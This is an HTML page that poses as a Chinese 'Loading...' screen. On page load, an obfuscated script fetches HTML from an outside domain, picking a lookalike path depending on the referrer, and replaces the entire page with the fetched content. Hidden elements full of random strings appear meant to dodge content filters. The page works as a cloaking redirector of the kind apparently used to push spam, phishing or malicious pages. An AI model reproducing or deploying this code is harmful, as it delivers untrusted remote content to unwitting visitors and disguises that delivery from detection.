<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .C34M8r {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .C34M8r .xzEuKHWDeS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .C34M8r .content {
            line-height: 50px;
            text-align: center
        }

        .C34M8r .img {
            width: 100%
        }

        .C34M8r .JOT686L5I2 {
            text-align: center
        }

        .C34M8r .JOT686L5I2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .C34M8r .JOT686L5I2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .C34M8r .JOT686L5I2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .C34M8r .JOT686L5I2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .C34M8r .JOT686L5I2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .C34M8r .JOT686L5I2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .C34M8r .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nSNvEMufu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var izpQqZB = nSNvEMufu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ izpQqZB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ izpQqZB +".html?a=share";
		}
		
        FjKgBdg=url+"#"+new Date().getTime();
        FjKgBdg && function() {
            $.get(FjKgBdg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>XZ6JU6aj1pz3MgHYcuTcHBivLPIO27X</p>
<li style='display:none' >zAOdI8tvvYLIhmZcIQM9TzdnSnuMxgSD1P1CUD4lHMYJYtPhVzidPqnhJt2GtGXKv4os20MfCcIV102kDVOLlVXhKNTb</li>
<img  src='' style='display:none'>
<p  style='display:none'>XZ6JU6aj1pz3MgHYcuTcHBivLPIO27X</p>
<b style='display:none' >YtsMJL8FuRpcXNNaHVjBNvjM4UYINF4c</b><div class="C34M8r">
    <div class="xzEuKHWDeS">
        <div class="JOT686L5I2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >NGQQTwYvwIs4arQAahBnyVvfyuwZtxCPzwlPRyW7rp5ud</ul>
<div style='display:none'>RnJq5x1WpRFMQxTRH</div>
<span style='display:none'>ZYopiwshKtyaOFqXnLO3HeFrvpSeTmDfNRdVt7iI0H5uoIZGSzMUvIjQSUWFlmU85F</span>
<h1 style='display:none' >rmxrdkM0F6yE5OiAV9b</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<li style='display:none' >APJyOP1nyfOA7cLojAwhD</li>
<div style='display:none'>RnJq5x1WpRFMQxTRH</div>
<h1 style='display:none' >rmxrdkM0F6yE5OiAV9b</h1>
<b style='display:none' >dD6eiY0gzHCf</b></body>
</html>